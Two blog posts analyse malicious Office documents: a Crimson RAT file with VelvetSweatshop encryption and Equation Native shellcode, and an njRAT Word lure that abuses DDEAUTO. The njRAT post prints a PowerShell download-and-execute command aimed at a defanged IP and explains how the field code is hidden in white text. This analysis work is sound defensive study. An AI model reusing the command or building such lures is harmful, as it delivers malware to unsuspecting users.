Crimson Rat (02-24-2020): VelvetSweatshop and shellcode

A few days ago, @killamjr outlined the steps he used to analyze this document. I haven’t done much with using other tools like XORsearch or scdbg.exe so decided to give it a go.

It didn’t go so well. But thanks to @killamjr’s help, updating all of Didier Steven’s tools, and this SANS blog post, it all worked out fine. Let’s work through it.

First things first, let’s use to see what lies underneath this document.


Instead of macros or vbaProject.bin files, we see ‘EncryptedPackage’. This means that the document itself has been protected with a password. However, if we try to open the document it won’t prompt for a password at all. What can we do from here? is a simple tool that can be used to crack passwords on MS documents. Running that tool gives us the password:


VelvetSweatshop? There’s only one man who would have a password like that.

Why didn’t I name this blog the Velvet Jones School of Technology?

Anyway, even though we know the password, there’s no place for us to put it in the document so that we can get access to the macros like we normally would. But at this point we have two options.

We could run on the document and use the output option (-o) to save the cracked file. We could then use OfficeMalScanner with inflate to dump all of the macros and .bin files.

Option 1: Output to cracked file and use OfficeMalScanner

Instead, we will be piping the output from directly into We will still need to make use of the output option (-o) as well as the ‘-‘ option to make the output go to stdout. All of that will get directed into

Option 2: Output directly into

We can now see that streams A3 – A6 have macros. They might be worth investigating. Stream B3’s size may contain something interesting as well. But stream C2’s name is ‘EQuAtIOn NatiVE’. This can contain shellcode or other encoded commands. That one is definitely worth looking at.

To do so, we need to add a few more options to We want to select C2 (-s C2) and then dump (-d)  out to a file. We’ll call it oledump.bin.


Running strings on oledump.bin doesn’t give us much of anything at all.


This means that the .bin file is likely shell code. To decode the binary, we will be using the tool XORsearch.exe. From the website:

XORSearch is a program to search for a given string in an XOR, ROL, ROT or SHIFT encoded binary file… XORSearch will try all XOR keys (0 to 255),  ROL keys (1 to 7), ROT keys (1 to 25) and SHIFT keys (1 to 7) when searching.

We will also be using the -W option to make use of XORsearch’s built in signatures.


It looks like a GetEIP instruction was found at position 0x2A7 without any encoding at all (XOR 00).

With our shellcode (oledump.bin) and offset (0x2A7) in hand, we can make us of a shellcode analyzer/emulator called scdbg.exe. There are two ways that we can use this. We can use the GUI to point it at oledump.bin, add the Start Offset, click Launch, and the decoded shellcode appears.

scdbg: gui_launcher.exe

Or we can use the command line version of it. We just need to point it at the file (option -f) and also give it the offset of 2A7 (option -foff). we should be getting the same output.

scdbg.exe with options -f and -foff

Note that we see the URL from which the file is going to be downloaded and also the location where it will be dropped.

Thanks for reading!


NJRAT (1.31.2020) – Malicious Document & DDEAUTO

DDEAUTO, which stands for automatic dynamic data exchange, is a feature in Microsoft Word that allows someone to pull data from one file directly into another file. It is supposed to work only within the application itself or if the two necessary applications are open.

It also has the ability to start cmd.exe. What could go wrong?

We will be working off of this document HERE. It downloads what identified as njrat. That can be found HERE.

Document Behavior

Upon opening the document, we see this alert. Note how it says that the document contains links that may refer to other files. This is your clue that it is using DDEAUTO. If you choose yes, it will ‘update this document with the data from the linked files’.


Clicking yes, gives us the following alert. Note, the bad things haven’t happened just yet, but if we choose yes again, bad things will start to happen. We can see the warning that the remote data is not accessible. Shall we instead start an application? Of course!


We can now see what happens next. WINWORD.EXE spawns cmd.exe, which then spawns powershell.exe.


What commands get executed here? Double-clicking on cmd.exe above (I was watching the processes spawn in Process Hacker) shows the following command line:

C:\Programs\Collection\MSWord\..\..\..\..\windows\system32\cmd.exe /k powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object System.Net.WebClient).DownloadFile('http[:]//208[.]167[.]245[.]254/signed1.exe','1.exe');start '1.exe'

It is not that difficult to see how this command works. Cmd.exe spawns powershell.exe, which downloads an executable, renames it, and then starts it.

Where can we find it in the document?

If we have the formatting symbols and paragraph marks turned on in Word, we can see that the body is not completely blank. If we highlight those characters, we can see that there is some text in white.


I will also be making the text red to make it easier to see. Right-clicking on the Russian characters, we see the option to Toggle Field Codes.


Selecting that option, we see the the string pop out.


Notice the carriage return symbol above. If we right-click on that and also choose Toggle Field Codes, the following appears.


And the numbers above translate into { QUOTE PowerShell }

As far as creating your own document like this (for testing purposes, of course), there are many blogs/videos that show how it is done. This one seemed rather promising:

Thanks for reading!